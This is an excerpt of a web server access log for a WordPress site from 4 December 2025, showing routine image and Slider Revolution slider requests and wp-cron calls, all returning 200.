205.169.39.19 - - [04/Dec/2025:09:58:43 +0800] "GET /wp-content/uploads/2025/07/1753453096-%E5%8F%8C%E7%9B%B8%E9%92%A2product_Single600%C3%97284.webp HTTP/1.1" 200 14562 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.19 - - [04/Dec/2025:09:58:44 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled-50x100.webp HTTP/1.1" 200 1660 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.19 - - [04/Dec/2025:09:58:44 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
36.133.115.36 - - [04/Dec/2025:09:58:44 +0800] "POST /wp-cron.php?doing_wp_cron=1764813524.3736650943756103515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
205.169.39.19 - - [04/Dec/2025:09:58:44 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=2 HTTP/1.1" 200 2058 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.19 - - [04/Dec/2025:09:58:44 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=3 HTTP/1.1" 200 2292 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.19 - - [04/Dec/2025:09:58:44 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled.webp HTTP/1.1" 200 197360 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.19 - - [04/Dec/2025:09:58:44 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled.webp HTTP/1.1" 200 141034 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.19 - - [04/Dec/2025:09:58:52 +0800] "GET /wp-content/uploads/revslider/slider-1/1750929639-yuanjing_Slider_3840%C3%972160_20250626171955-scaled-50x100.webp HTTP/1.1" 200 1784 "http://cqqizhou.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/127.0.6533.119 Safari/537.36"
36.133.115.36 - - [04/Dec/2025:10:02:09 +0800] "POST /wp-cron.php?doing_wp_cron=1764813729.2132279872894287109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
